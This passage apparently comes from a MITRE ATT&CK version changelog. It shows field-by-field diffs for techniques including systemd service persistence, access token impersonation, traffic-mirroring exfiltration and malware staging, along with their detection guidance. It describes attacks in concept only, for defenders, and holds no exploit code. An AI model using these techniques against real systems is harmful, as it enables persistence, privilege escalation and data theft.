x_mitre_detectionCommand-line interface monitoring may be useful to detect instances of net.exe or other command-line utilities being used to gather system time or time zone. Methods of detecting API use for gathering this information are likely less useful due to how often they may be used by legitimate software.Command-line interface monitoring may be useful to detect instances of net.exe or other command-line utilities being used to gather system time or time zone. Methods of detecting API use for gathering this information are likely less useful due to how often they may be used by legitimate software. For network infrastructure devices, collect AAA logging to monitor `show` commands being run by non-standard users from non-standard locations.
x_mitre_version1.21.3
iterable_item_added
STIX FieldOld valueNew Value
x_mitre_contributorsAustin Clark, @c2defense
x_mitre_platformsNetwork

[T1543.002] Create or Modify System Process: Systemd Service

Current version: 1.3

Version changed from: 1.2 → 1.3


Old Description
New Description
t1Adversaries may create or modify systemd services to repeatet1Adversaries may create or modify systemd services to repeate
>dly execute malicious payloads as part of persistence. The s>dly execute malicious payloads as part of persistence. Syste
>ystemd service manager is commonly used for managing backgro>md is a system and service manager commonly used for managin
>und daemon processes (also known as services) and other syst>g background daemon processes (also known as services) and o
>em resources.(Citation: Linux man-pages: systemd January 201>ther system resources.(Citation: Linux man-pages: systemd Ja
>4)(Citation: Freedesktop.org Linux systemd 29SEP2018) System>nuary 2014) Systemd is the default initialization (init) sys
>d is the default initialization (init) system on many Linux >tem on many Linux distributions replacing legacy init system
>distributions starting with Debian 8, Ubuntu 15.04, CentOS 7>s, including SysVinit and Upstart, while remaining backwards
>, RHEL 7, Fedora 15, and replaces legacy init systems includ> compatible.    Systemd utilizes unit configuration files wi
>ing SysVinit and Upstart while remaining backwards compatibl>th the `.service` file extension to encode information about
>e with the aforementioned init systems.  Systemd utilizes co> a service's process. By default, system level unit files ar
>nfiguration files known as service units to control how serv>e stored in the `/systemd/system` directory of the root owne
>ices boot and under what conditions. By default, these unit >d directories (`/`). User level unit files are stored in the
>files are stored in the <code>/etc/systemd/system</code> and> `/systemd/user` directories of the user owned directories (
> <code>/usr/lib/systemd/system</code> directories and have t>`$HOME`). (Citation: lambert systemd 2022)   Service unit fi
>he file extension <code>.service</code>. Each service unit f>les use the following directives to execute system commands:
>ile may contain numerous directives that can execute system >(Citation: freedesktop systemd.service)    * `ExecStart`, `E
>commands:  * ExecStart, ExecStartPre, and ExecStartPost dire>xecStartPre`, and `ExecStartPost` directives cover execution
>ctives cover execution of commands when a services is starte> of commands when a service is started manually by `systemct
>d manually by 'systemctl' or on system start if the service >l`, or on system start if the service is set to automaticall
>is set to automatically start.  * ExecReload directive cover>y start. * `ExecReload` directive covers when a service rest
>s when a service restarts.  * ExecStop and ExecStopPost dire>arts.  * `ExecStop`, `ExecStopPre`, and `ExecStopPost` direc
>ctives cover when a service is stopped or manually by 'syste>tives cover when a service is stopped.    Adversaries may ab
>mctl'.  Adversaries have used systemd functionality to estab>use systemd functionality to establish persistent access to 
>lish persistent access to victim systems by creating and/or >victim systems by creating and/or modifying service unit fil
>modifying service unit files that cause systemd to execute m>es systemd uses upon reboot or starting a service.(Citation:
>alicious commands at system boot.(Citation: Anomali Rocke Ma> Anomali Rocke March 2019) Adversaries may also place symbol
>rch 2019)  While adversaries typically require root privileg>ic links in these directories, enabling systemd to find thes
>es to create/modify service unit files in the <code>/etc/sys>e payloads regardless of where they reside on the filesystem
>temd/system</code> and <code>/usr/lib/systemd/system</code> >.  The `.service` file’s `User` directive can be used to run
>directories, low privilege users can create/modify service u> service as a specific user, which could result in privilege
>nit files in directories such as <code>~/.config/systemd/use> escalation based on specific user/group permissions.(Citati
>r/</code> to achieve user-level persistence.(Citation: Rapid>on: Rapid7 Service Persistence 22JUNE2016) 
>7 Service Persistence 22JUNE2016) 
Details
dictionary_item_added
STIX FieldOld valueNew Value
x_mitre_attack_spec_version3.1.0
x_mitre_deprecatedFalse
external_referencesAnomali Labs. (2019, March 15). Rocke Evolves Its Arsenal With a New Malware Family Written in Golang. Retrieved April 24, 2019.
external_referencesFree Desktop. (n.d.). systemd.service — Service unit configuration. Retrieved March 20, 2023.
dictionary_item_removed
STIX FieldOld valueNew Value
external_referencesCAPEC-550
external_referencesCAPEC-551
values_changed
STIX FieldOld valueNew Value
modified2020-10-09 13:46:29.701000+00:002023-04-12 20:13:07.604000+00:00
descriptionAdversaries may create or modify systemd services to repeatedly execute malicious payloads as part of persistence. The systemd service manager is commonly used for managing background daemon processes (also known as services) and other system resources.(Citation: Linux man-pages: systemd January 2014)(Citation: Freedesktop.org Linux systemd 29SEP2018) Systemd is the default initialization (init) system on many Linux distributions starting with Debian 8, Ubuntu 15.04, CentOS 7, RHEL 7, Fedora 15, and replaces legacy init systems including SysVinit and Upstart while remaining backwards compatible with the aforementioned init systems. Systemd utilizes configuration files known as service units to control how services boot and under what conditions. By default, these unit files are stored in the /etc/systemd/system and /usr/lib/systemd/system directories and have the file extension .service. Each service unit file may contain numerous directives that can execute system commands: * ExecStart, ExecStartPre, and ExecStartPost directives cover execution of commands when a services is started manually by 'systemctl' or on system start if the service is set to automatically start. * ExecReload directive covers when a service restarts. * ExecStop and ExecStopPost directives cover when a service is stopped or manually by 'systemctl'. Adversaries have used systemd functionality to establish persistent access to victim systems by creating and/or modifying service unit files that cause systemd to execute malicious commands at system boot.(Citation: Anomali Rocke March 2019) While adversaries typically require root privileges to create/modify service unit files in the /etc/systemd/system and /usr/lib/systemd/system directories, low privilege users can create/modify service unit files in directories such as ~/.config/systemd/user/ to achieve user-level persistence.(Citation: Rapid7 Service Persistence 22JUNE2016)Adversaries may create or modify systemd services to repeatedly execute malicious payloads as part of persistence. Systemd is a system and service manager commonly used for managing background daemon processes (also known as services) and other system resources.(Citation: Linux man-pages: systemd January 2014) Systemd is the default initialization (init) system on many Linux distributions replacing legacy init systems, including SysVinit and Upstart, while remaining backwards compatible. Systemd utilizes unit configuration files with the `.service` file extension to encode information about a service's process. By default, system level unit files are stored in the `/systemd/system` directory of the root owned directories (`/`). User level unit files are stored in the `/systemd/user` directories of the user owned directories (`$HOME`). (Citation: lambert systemd 2022) Service unit files use the following directives to execute system commands:(Citation: freedesktop systemd.service) * `ExecStart`, `ExecStartPre`, and `ExecStartPost` directives cover execution of commands when a service is started manually by `systemctl`, or on system start if the service is set to automatically start. * `ExecReload` directive covers when a service restarts. * `ExecStop`, `ExecStopPre`, and `ExecStopPost` directives cover when a service is stopped. Adversaries may abuse systemd functionality to establish persistent access to victim systems by creating and/or modifying service unit files systemd uses upon reboot or starting a service.(Citation: Anomali Rocke March 2019) Adversaries may also place symbolic links in these directories, enabling systemd to find these payloads regardless of where they reside on the filesystem. The `.service` file’s `User` directive can be used to run service as a specific user, which could result in privilege escalation based on specific user/group permissions.(Citation: Rapid7 Service Persistence 22JUNE2016)
external_references[1]['source_name']capecAnomali Rocke March 2019
external_references[1]['url']https://capec.mitre.org/data/definitions/550.htmlhttps://www.anomali.com/blog/rocke-evolves-its-arsenal-with-a-new-malware-family-written-in-golang
external_references[2]['source_name']capecfreedesktop systemd.service
external_references[2]['url']https://capec.mitre.org/data/definitions/551.htmlhttps://www.freedesktop.org/software/systemd/man/systemd.service.html
external_references[4]['source_name']Freedesktop.org Linux systemd 29SEP2018Berba hunting linux systemd
external_references[4]['description']Freedesktop.org. (2018, September 29). systemd System and Service Manager. Retrieved April 23, 2019.Pepe Berba. (2022, January 30). Hunting for Persistence in Linux (Part 3): Systemd, Timers, and Cron. Retrieved March 20, 2023.
external_references[4]['url']https://www.freedesktop.org/wiki/Software/systemd/https://pberba.github.io/security/2022/01/30/linux-threat-hunting-for-persistence-systemd-timers-cron/
external_references[5]['source_name']Anomali Rocke March 2019Rapid7 Service Persistence 22JUNE2016
external_references[5]['description']Anomali Labs. (2019, March 15). Rocke Evolves Its Arsenal With a New Malware Family Written in Golang. Retrieved April 24, 2019.Rapid7. (2016, June 22). Service Persistence. Retrieved April 23, 2019.
external_references[5]['url']https://www.anomali.com/blog/rocke-evolves-its-arsenal-with-a-new-malware-family-written-in-golanghttps://www.rapid7.com/db/modules/exploit/linux/local/service_persistence
external_references[6]['source_name']Rapid7 Service Persistence 22JUNE2016lambert systemd 2022
external_references[6]['description']Rapid7. (2016, June 22). Service Persistence. Retrieved April 23, 2019.Tony Lambert. (2022, November 13). ATT&CK T1501: Understanding systemd service persistence. Retrieved March 20, 2023.
external_references[6]['url']https://www.rapid7.com/db/modules/exploit/linux/local/service_persistencehttps://redcanary.com/blog/attck-t1501-understanding-systemd-service-persistence/
x_mitre_data_sources[0]Process: Process CreationService: Service Modification
x_mitre_data_sources[2]Service: Service CreationFile: File Creation
x_mitre_data_sources[3]File: File CreationService: Service Creation
x_mitre_data_sources[4]File: File ModificationProcess: Process Creation
x_mitre_data_sources[5]Service: Service ModificationFile: File Modification
x_mitre_detectionSystemd service unit files may be detected by auditing file creation and modification events within the /etc/systemd/system, /usr/lib/systemd/system/, and /home//.config/systemd/user/ directories, as well as associated symbolic links. Suspicious processes or scripts spawned in this manner will have a parent process of ‘systemd’, a parent process ID of 1, and will usually execute as the ‘root’ user. Suspicious systemd services can also be identified by comparing results against a trusted system baseline. Malicious systemd services may be detected by using the systemctl utility to examine system wide services: systemctl list-units -–type=service –all. Analyze the contents of .service files present on the file system and ensure that they refer to legitimate, expected executables. Auditing the execution and command-line arguments of the 'systemctl' utility, as well related utilities such as /usr/sbin/service may reveal malicious systemd service execution.Monitor file creation and modification events of Systemd service unit configuration files in the default directory locations for `root` & `user` level permissions. Suspicious processes or scripts spawned in this manner will have a parent process of ‘systemd’, a parent process ID of 1, and will usually execute as the `root` user.(Citation: lambert systemd 2022) Suspicious systemd services can also be identified by comparing results against a trusted system baseline. Malicious systemd services may be detected by using the systemctl utility to examine system wide services: `systemctl list-units -–type=service –all`. Analyze the contents of `.service` files present on the file system and ensure that they refer to legitimate, expected executables, and symbolic links.(Citation: Berba hunting linux systemd) Auditing the execution and command-line arguments of the `systemctl` utility, as well related utilities such as `/usr/sbin/service` may reveal malicious systemd service execution.
x_mitre_version1.21.3
iterable_item_added
STIX FieldOld valueNew Value
x_mitre_contributorsEmad Al-Mousa, Saudi Aramco

[T1134.001] Access Token Manipulation: Token Impersonation/Theft

Current version: 1.1

Version changed from: 1.0 → 1.1


Old Description
New Description
t1Adversaries may duplicate then impersonate another user's tot1Adversaries may duplicate then impersonate another user's ex
>ken to escalate privileges and bypass access controls. An ad>isting token to escalate privileges and bypass access contro
>versary can create a new access token that duplicates an exi>ls. For example, an adversary can duplicate an existing toke
>sting token using <code>DuplicateToken(Ex)</code>. The token>n using `DuplicateToken` or `DuplicateTokenEx`. The token ca
> can then be used with <code>ImpersonateLoggedOnUser</code> >n then be used with `ImpersonateLoggedOnUser` to allow the c
>to allow the calling thread to impersonate a logged on user'>alling thread to impersonate a logged on user's security con
>s security context, or with <code>SetThreadToken</code> to a>text, or with `SetThreadToken` to assign the impersonated to
>ssign the impersonated token to a thread.  An adversary may >ken to a thread.  An adversary may perform [Token Impersonat
>do this when they have a specific, existing process they wan>ion/Theft](https://attack.mitre.org/techniques/T1134/001) wh
>t to assign the new token to. For example, this may be usefu>en they have a specific, existing process they want to assig
>l for when the target user has a non-network logon session o>n the duplicated token to. For example, this may be useful f
>n the system.>or when the target user has a non-network logon session on t
 >he system.  When an adversary would instead use a duplicated
 > token to create a new process rather than attaching to an e
 >xisting process, they can additionally [Create Process with 
 >Token](https://attack.mitre.org/techniques/T1134/002) using 
 >`CreateProcessWithTokenW` or `CreateProcessAsUserW`. [Token 
 >Impersonation/Theft](https://attack.mitre.org/techniques/T11
 >34/001) is also distinct from [Make and Impersonate Token](h
 >ttps://attack.mitre.org/techniques/T1134/003) in that it ref
 >ers to duplicating an existing token, rather than creating a
 > new one.
Details
dictionary_item_added
STIX FieldOld valueNew Value
x_mitre_attack_spec_version3.1.0
x_mitre_contributors['Jonny Johnson']
x_mitre_deprecatedFalse
values_changed
STIX FieldOld valueNew Value
modified2020-03-26 21:29:18.608000+00:002023-04-11 21:19:05.544000+00:00
descriptionAdversaries may duplicate then impersonate another user's token to escalate privileges and bypass access controls. An adversary can create a new access token that duplicates an existing token using DuplicateToken(Ex). The token can then be used with ImpersonateLoggedOnUser to allow the calling thread to impersonate a logged on user's security context, or with SetThreadToken to assign the impersonated token to a thread. An adversary may do this when they have a specific, existing process they want to assign the new token to. For example, this may be useful for when the target user has a non-network logon session on the system.Adversaries may duplicate then impersonate another user's existing token to escalate privileges and bypass access controls. For example, an adversary can duplicate an existing token using `DuplicateToken` or `DuplicateTokenEx`. The token can then be used with `ImpersonateLoggedOnUser` to allow the calling thread to impersonate a logged on user's security context, or with `SetThreadToken` to assign the impersonated token to a thread. An adversary may perform [Token Impersonation/Theft](https://attack.mitre.org/techniques/T1134/001) when they have a specific, existing process they want to assign the duplicated token to. For example, this may be useful for when the target user has a non-network logon session on the system. When an adversary would instead use a duplicated token to create a new process rather than attaching to an existing process, they can additionally [Create Process with Token](https://attack.mitre.org/techniques/T1134/002) using `CreateProcessWithTokenW` or `CreateProcessAsUserW`. [Token Impersonation/Theft](https://attack.mitre.org/techniques/T1134/001) is also distinct from [Make and Impersonate Token](https://attack.mitre.org/techniques/T1134/003) in that it refers to duplicating an existing token, rather than creating a new one.
x_mitre_version1.01.1

[T1020.001] Automated Exfiltration: Traffic Duplication

Current version: 1.2

Version changed from: 1.1 → 1.2


Old Description
New Description
t1Adversaries may leverage traffic mirroring in order to automt1Adversaries may leverage traffic mirroring in order to autom
>ate data exfiltration over compromised network infrastructur>ate data exfiltration over compromised infrastructure. Traff
>e.  Traffic mirroring is a native feature for some network d>ic mirroring is a native feature for some devices, often use
>evices and used for network analysis and may be configured t>d for network analysis. For example, devices may be configur
>o duplicate traffic and forward to one or more destinations >ed to forward network traffic to one or more destinations fo
>for analysis by a network analyzer or other monitoring devic>r analysis by a network analyzer or other monitoring device.
>e. (Citation: Cisco Traffic Mirroring)(Citation: Juniper Tra> (Citation: Cisco Traffic Mirroring)(Citation: Juniper Traff
>ffic Mirroring)  Adversaries may abuse traffic mirroring to >ic Mirroring)  Adversaries may abuse traffic mirroring to mi
>mirror or redirect network traffic through other network inf>rror or redirect network traffic through other infrastructur
>rastructure they control. Malicious modifications to network>e they control. Malicious modifications to network devices t
> devices to enable traffic redirection may be possible throu>o enable traffic redirection may be possible through [ROMMON
>gh [ROMMONkit](https://attack.mitre.org/techniques/T1542/004>kit](https://attack.mitre.org/techniques/T1542/004) or [Patc
>) or [Patch System Image](https://attack.mitre.org/technique>h System Image](https://attack.mitre.org/techniques/T1601/00
>s/T1601/001).(Citation: US-CERT-TA18-106A)(Citation: Cisco B>1).(Citation: US-CERT-TA18-106A)(Citation: Cisco Blog Legacy
>log Legacy Device Attacks) Adversaries may use traffic dupli> Device Attacks)  Many cloud-based environments also support
>cation in conjunction with [Network Sniffing](https://attack> traffic mirroring. For example, AWS Traffic Mirroring, GCP 
>.mitre.org/techniques/T1040), [Input Capture](https://attack>Packet Mirroring, and Azure vTap allow users to define speci
>.mitre.org/techniques/T1056), or [Adversary-in-the-Middle](h>fied instances to collect traffic from and specified targets
>ttps://attack.mitre.org/techniques/T1557) depending on the g> to send collected traffic to.(Citation: AWS Traffic Mirrori
>oals and objectives of the adversary.>ng)(Citation: GCP Packet Mirroring)(Citation: Azure Virtual 
 >Network TAP)  Adversaries may use traffic duplication in con
 >junction with [Network Sniffing](https://attack.mitre.org/te
 >chniques/T1040), [Input Capture](https://attack.mitre.org/te
 >chniques/T1056), or [Adversary-in-the-Middle](https://attack
 >.mitre.org/techniques/T1557) depending on the goals and obje
 >ctives of the adversary.

New Mitigations:

Details
dictionary_item_added
STIX FieldOld valueNew Value
x_mitre_network_requirementsFalse
external_referencesMicrosoft. (2022, February 9). Virtual network TAP. Retrieved March 17, 2022.
dictionary_item_removed
STIX FieldOld valueNew Value
external_referencesCAPEC-117
values_changed
STIX FieldOld valueNew Value
modified2022-04-18 22:16:51.359000+00:002023-04-14 23:23:30.327000+00:00
descriptionAdversaries may leverage traffic mirroring in order to automate data exfiltration over compromised network infrastructure. Traffic mirroring is a native feature for some network devices and used for network analysis and may be configured to duplicate traffic and forward to one or more destinations for analysis by a network analyzer or other monitoring device. (Citation: Cisco Traffic Mirroring)(Citation: Juniper Traffic Mirroring) Adversaries may abuse traffic mirroring to mirror or redirect network traffic through other network infrastructure they control. Malicious modifications to network devices to enable traffic redirection may be possible through [ROMMONkit](https://attack.mitre.org/techniques/T1542/004) or [Patch System Image](https://attack.mitre.org/techniques/T1601/001).(Citation: US-CERT-TA18-106A)(Citation: Cisco Blog Legacy Device Attacks) Adversaries may use traffic duplication in conjunction with [Network Sniffing](https://attack.mitre.org/techniques/T1040), [Input Capture](https://attack.mitre.org/techniques/T1056), or [Adversary-in-the-Middle](https://attack.mitre.org/techniques/T1557) depending on the goals and objectives of the adversary.Adversaries may leverage traffic mirroring in order to automate data exfiltration over compromised infrastructure. Traffic mirroring is a native feature for some devices, often used for network analysis. For example, devices may be configured to forward network traffic to one or more destinations for analysis by a network analyzer or other monitoring device. (Citation: Cisco Traffic Mirroring)(Citation: Juniper Traffic Mirroring) Adversaries may abuse traffic mirroring to mirror or redirect network traffic through other infrastructure they control. Malicious modifications to network devices to enable traffic redirection may be possible through [ROMMONkit](https://attack.mitre.org/techniques/T1542/004) or [Patch System Image](https://attack.mitre.org/techniques/T1601/001).(Citation: US-CERT-TA18-106A)(Citation: Cisco Blog Legacy Device Attacks) Many cloud-based environments also support traffic mirroring. For example, AWS Traffic Mirroring, GCP Packet Mirroring, and Azure vTap allow users to define specified instances to collect traffic from and specified targets to send collected traffic to.(Citation: AWS Traffic Mirroring)(Citation: GCP Packet Mirroring)(Citation: Azure Virtual Network TAP) Adversaries may use traffic duplication in conjunction with [Network Sniffing](https://attack.mitre.org/techniques/T1040), [Input Capture](https://attack.mitre.org/techniques/T1056), or [Adversary-in-the-Middle](https://attack.mitre.org/techniques/T1557) depending on the goals and objectives of the adversary.
external_references[1]['source_name']Cisco Traffic MirroringAWS Traffic Mirroring
external_references[1]['description']Cisco. (n.d.). Cisco IOS XR Interface and Hardware Component Configuration Guide for the Cisco CRS Router, Release 5.1.x. Retrieved October 19, 2020.Amazon Web Services. (n.d.). How Traffic Mirroring works. Retrieved March 17, 2022.
external_references[1]['url']https://www.cisco.com/c/en/us/td/docs/routers/crs/software/crs_r5-1/interfaces/configuration/guide/hc51xcrsbook/hc51span.htmlhttps://docs.aws.amazon.com/vpc/latest/mirroring/traffic-mirroring-how-it-works.html
external_references[2]['source_name']Juniper Traffic MirroringCisco Traffic Mirroring
external_references[2]['description']Juniper. (n.d.). Understanding Port Mirroring on EX2200, EX3200, EX3300, EX4200, EX4500, EX4550, EX6200, and EX8200 Series Switches. Retrieved October 19, 2020.Cisco. (n.d.). Cisco IOS XR Interface and Hardware Component Configuration Guide for the Cisco CRS Router, Release 5.1.x. Retrieved October 19, 2020.
external_references[2]['url']https://www.juniper.net/documentation/en_US/junos/topics/concept/port-mirroring-ex-series.htmlhttps://www.cisco.com/c/en/us/td/docs/routers/crs/software/crs_r5-1/interfaces/configuration/guide/hc51xcrsbook/hc51span.html
external_references[3]['source_name']Cisco Blog Legacy Device AttacksGCP Packet Mirroring
external_references[3]['description']Omar Santos. (2020, October 19). Attackers Continue to Target Legacy Devices. Retrieved October 20, 2020.Google Cloud. (n.d.). Packet Mirroring overview. Retrieved March 17, 2022.
external_references[3]['url']https://community.cisco.com/t5/security-blogs/attackers-continue-to-target-legacy-devices/ba-p/4169954https://cloud.google.com/vpc/docs/packet-mirroring
external_references[4]['source_name']US-CERT-TA18-106AJuniper Traffic Mirroring
external_references[4]['description']US-CERT. (2018, April 20). Alert (TA18-106A) Russian State-Sponsored Cyber Actors Targeting Network Infrastructure Devices. Retrieved October 19, 2020.Juniper. (n.d.). Understanding Port Mirroring on EX2200, EX3200, EX3300, EX4200, EX4500, EX4550, EX6200, and EX8200 Series Switches. Retrieved October 19, 2020.
external_references[4]['url']https://www.us-cert.gov/ncas/alerts/TA18-106Ahttps://www.juniper.net/documentation/en_US/junos/topics/concept/port-mirroring-ex-series.html
external_references[5]['source_name']capecAzure Virtual Network TAP
external_references[5]['url']https://capec.mitre.org/data/definitions/117.htmlhttps://docs.microsoft.com/en-us/azure/virtual-network/virtual-network-tap-overview
x_mitre_attack_spec_version2.1.03.1.0
x_mitre_data_sources[0]Network Traffic: Network Traffic FlowNetwork Traffic: Network Connection Creation
x_mitre_data_sources[1]Network Traffic: Network Connection CreationNetwork Traffic: Network Traffic Flow
x_mitre_version1.11.2
iterable_item_added
STIX FieldOld valueNew Value
external_references{'source_name': 'Cisco Blog Legacy Device Attacks', 'description': 'Omar Santos. (2020, October 19). Attackers Continue to Target Legacy Devices. Retrieved October 20, 2020.', 'url': 'https://community.cisco.com/t5/security-blogs/attackers-continue-to-target-legacy-devices/ba-p/4169954'}
external_references{'source_name': 'US-CERT-TA18-106A', 'description': 'US-CERT. (2018, April 20). Alert (TA18-106A) Russian State-Sponsored Cyber Actors Targeting Network Infrastructure Devices. Retrieved October 19, 2020.', 'url': 'https://www.us-cert.gov/ncas/alerts/TA18-106A'}
x_mitre_platformsIaaS

[T1552] Unsecured Credentials

Current version: 1.3

Version changed from: 1.2 → 1.3

New Mitigations:

New Detections:

Details
dictionary_item_added
STIX FieldOld valueNew Value
x_mitre_attack_spec_version3.1.0
x_mitre_contributors['Austin Clark, @c2defense']
x_mitre_deprecatedFalse
dictionary_item_removed
STIX FieldOld valueNew Value
x_mitre_permissions_required['User', 'Administrator', 'SYSTEM']
values_changed
STIX FieldOld valueNew Value
modified2022-04-01 13:11:11.386000+00:002023-04-13 00:29:53.605000+00:00
x_mitre_data_sources[2]User Account: User Account AuthenticationFile: File Access
x_mitre_data_sources[4]File: File AccessApplication Log: Application Log Content
x_mitre_version1.21.3
iterable_item_added
STIX FieldOld valueNew Value
x_mitre_data_sourcesUser Account: User Account Authentication
x_mitre_platformsNetwork

[T1608.001] Stage Capabilities: Upload Malware

Current version: 1.2

Version changed from: 1.1 → 1.2


Old Description
New Description
t1Adversaries may upload malware to third-party or adversary ct1Adversaries may upload malware to third-party or adversary c
>ontrolled infrastructure to make it accessible during target>ontrolled infrastructure to make it accessible during target
>ing. Malicious software can include payloads, droppers, post>ing. Malicious software can include payloads, droppers, post
>-compromise tools, backdoors, and a variety of other malicio>-compromise tools, backdoors, and a variety of other malicio
>us content. Adversaries may upload malware to support their >us content. Adversaries may upload malware to support their 
>operations, such as making a payload available to a victim n>operations, such as making a payload available to a victim n
>etwork to enable [Ingress Tool Transfer](https://attack.mitr>etwork to enable [Ingress Tool Transfer](https://attack.mitr
>e.org/techniques/T1105) by placing it on an Internet accessi>e.org/techniques/T1105) by placing it on an Internet accessi
>ble web server.  Malware may be placed on infrastructure tha>ble web server.  Malware may be placed on infrastructure tha
>t was previously purchased/rented by the adversary ([Acquire>t was previously purchased/rented by the adversary ([Acquire
> Infrastructure](https://attack.mitre.org/techniques/T1583))> Infrastructure](https://attack.mitre.org/techniques/T1583))
> or was otherwise compromised by them ([Compromise Infrastru> or was otherwise compromised by them ([Compromise Infrastru
>cture](https://attack.mitre.org/techniques/T1584)). Malware >cture](https://attack.mitre.org/techniques/T1584)). Malware 
>can also be staged on web services, such as GitHub or Pasteb>can also be staged on web services, such as GitHub or Pasteb
>in.(Citation: Volexity Ocean Lotus November 2020)  Adversari>in, or hosted on the InterPlanetary File System (IPFS), wher
>es may upload backdoored files, such as application binaries>e decentralized content storage makes the removal of malicio
>, virtual machine images, or container images, to third-part>us files difficult.(Citation: Volexity Ocean Lotus November 
>y software stores or repositories (ex: GitHub, CNET, AWS Com>2020)(Citation: Talos IPFS 2022)  Adversaries may upload bac
>munity AMIs, Docker Hub). By chance encounter, victims may d>kdoored files, such as application binaries, virtual machine
>irectly download/install these backdoored files via [User Ex> images, or container images, to third-party software stores
>ecution](https://attack.mitre.org/techniques/T1204). [Masque> or repositories (ex: GitHub, CNET, AWS Community AMIs, Dock
>rading](https://attack.mitre.org/techniques/T1036) may incre>er Hub). By chance encounter, victims may directly download/
>ase the chance of users mistakenly executing these files.>install these backdoored files via [User Execution](https://
 >attack.mitre.org/techniques/T1204). [Masquerading](https://a
 >ttack.mitre.org/techniques/T1036) may increase the chance of
 > users mistakenly executing these files.
Details
dictionary_item_added
STIX FieldOld valueNew Value
x_mitre_attack_spec_version3.1.0
x_mitre_deprecatedFalse
values_changed
STIX FieldOld valueNew Value
modified2021-10-17 16:24:48.949000+00:002023-04-11 23:22:49.534000+00:00
descriptionAdversaries may upload malware to third-party or adversary controlled infrastructure to make it accessible during targeting. Malicious software can include payloads, droppers, post-compromise tools, backdoors, and a variety of other malicious content. Adversaries may upload malware to support their operations, such as making a payload available to a victim network to enable [Ingress Tool Transfer](https://attack.mitre.org/techniques/T1105) by placing it on an Internet accessible web server. Malware may be placed on infrastructure that was previously purchased/rented by the adversary ([Acquire Infrastructure](https://attack.mitre.org/techniques/T1583)) or was otherwise compromised by them ([Compromise Infrastructure](https://attack.mitre.org/techniques/T1584)). Malware can also be staged on web services, such as GitHub or Pastebin.(Citation: Volexity Ocean Lotus November 2020) Adversaries may upload backdoored files, such as application binaries, virtual machine images, or container images, to third-party software stores or repositories (ex: GitHub, CNET, AWS Community AMIs, Docker Hub). By chance encounter, victims may directly download/install these backdoored files via [User Execution](https://attack.mitre.org/techniques/T1204). [Masquerading](https://attack.mitre.org/techniques/T1036) may increase the chance of users mistakenly executing these files.Adversaries may upload malware to third-party or adversary controlled infrastructure to make it accessible during targeting. Malicious software can include payloads, droppers, post-compromise tools, backdoors, and a variety of other malicious content. Adversaries may upload malware to support their operations, such as making a payload available to a victim network to enable [Ingress Tool Transfer](https://attack.mitre.org/techniques/T1105) by placing it on an Internet accessible web server. Malware may be placed on infrastructure that was previously purchased/rented by the adversary ([Acquire Infrastructure](https://attack.mitre.org/techniques/T1583)) or was otherwise compromised by them ([Compromise Infrastructure](https://attack.mitre.org/techniques/T1584)). Malware can also be staged on web services, such as GitHub or Pastebin, or hosted on the InterPlanetary File System (IPFS), where decentralized content storage makes the removal of malicious files difficult.(Citation: Volexity Ocean Lotus November 2020)(Citation: Talos IPFS 2022) Adversaries may upload backdoored files, such as application binaries, virtual machine images, or container images, to third-party software stores or repositories (ex: GitHub, CNET, AWS Community AMIs, Docker Hub). By chance encounter, victims may directly download/install these backdoored files via [User Execution](https://attack.mitre.org/techniques/T1204). [Masquerading](https://attack.mitre.org/techniques/T1036) may increase the chance of users mistakenly executing these files.
x_mitre_version1.11.2
iterable_item_added
STIX FieldOld valueNew Value
external_references{'source_name': 'Talos IPFS 2022', 'description': 'Edmund Brumaghin. (2022, November 9). Threat Spotlight: Cyber Criminal Adoption of IPFS for Phishing, Malware Campaigns. Retrieved March 8, 2023.', 'url': 'https://blog.talosintelligence.com/ipfs-abuse/'}
x_mitre_contributorsGoldstein Menachem

[T1078] Valid Accounts

Current version: 2.6

Version changed from: 2.5 → 2.6

New Mitigations:

Dropped Mitigations:

Details
values_changed
STIX FieldOld valueNew Value
modified2022-10-19 19:57:39.849000+00:002023-03-30 21:01:51.631000+00:00
x_mitre_attack_spec_version2.1.03.1.0
x_mitre_version2.52.6
iterable_item_added
STIX FieldOld valueNew Value
x_mitre_contributorsGoldstein Menachem
x_mitre_data_sourcesUser Account: User Account Authentication
iterable_item_removed
STIX FieldOld valueNew Value
external_references{'source_name': 'capec', 'url': 'https://capec.mitre.org/data/definitions/560.html', 'external_id': 'CAPEC-560'}
x_mitre_data_sourcesUser Account: User Account Authentication

[T1059.005] Command and Scripting Interpreter: Visual Basic

Current version: 1.4

Version changed from: 1.3 → 1.4

Details
dictionary_item_added
STIX FieldOld valueNew Value
x_mitre_attack_spec_version3.1.0
x_mitre_deprecatedFalse
x_mitre_remote_supportFalse
dictionary_item_removed
STIX FieldOld valueNew Value
x_mitre_permissions_required['User', 'Administrator', 'SYSTEM']
values_changed
STIX FieldOld valueNew Value
modified2022-03-07 19:43:49.315000+00:002023-04-07 17:13:03.738000+00:00
external_references[2]['source_name']VB MicrosoftDefault VBS macros Blocking
external_references[2]['description']Microsoft. (n.d.). Visual Basic documentation. Retrieved June 23, 2020.Kellie Eickmeyer. (2022, February 7). Helping users stay safe: Blocking internet macros by default in Office. Retrieved February 7, 2022.
external_references[2]['url']https://docs.microsoft.com/dotnet/visual-basic/https://techcommunity.microsoft.com/t5/microsoft-365-blog/helping-users-stay-safe-blocking-internet-macros-by-default-in/ba-p/3071805
external_references[3]['source_name']Microsoft VBAMicrosoft VBScript
external_references[3]['description']Microsoft. (2019, June 11). Office VBA Reference. Retrieved June 23, 2020.Microsoft. (2011, April 19). What Is VBScript?. Retrieved March 28, 2020.
external_references[3]['url']https://docs.microsoft.com/office/vba/api/overview/https://docs.microsoft.com/previous-versions//1kw29xwf(v=vs.85)
external_references[4]['source_name']Wikipedia VBAMicrosoft VBA
external_references[4]['description']Wikipedia. (n.d.). Visual Basic for Applications. Retrieved August 13, 2020.Microsoft. (2019, June 11). Office VBA Reference. Retrieved June 23, 2020.
external_references[4]['url']https://en.wikipedia.org/wiki/Visual_Basic_for_Applicationshttps://docs.microsoft.com/office/vba/api/overview/
external_references[5]['source_name']Microsoft VBScriptVB Microsoft
external_references[5]['description']Microsoft. (2011, April 19). What Is VBScript?. Retrieved March 28, 2020.Microsoft. (n.d.). Visual Basic documentation. Retrieved June 23, 2020.
external_references[5]['url']https://docs.microsoft.com/previous-versions//1kw29xwf(v=vs.85)https://docs.microsoft.com/dotnet/visual-basic/
external_references[6]['source_name']Default VBS macros Blocking Wikipedia VBA
external_references[6]['description']Kellie Eickmeyer. (2022, February 7). Helping users stay safe: Blocking internet macros by default in Office. Retrieved February 7, 2022.Wikipedia. (n.d.). Visual Basic for Applications. Retrieved August 13, 2020.
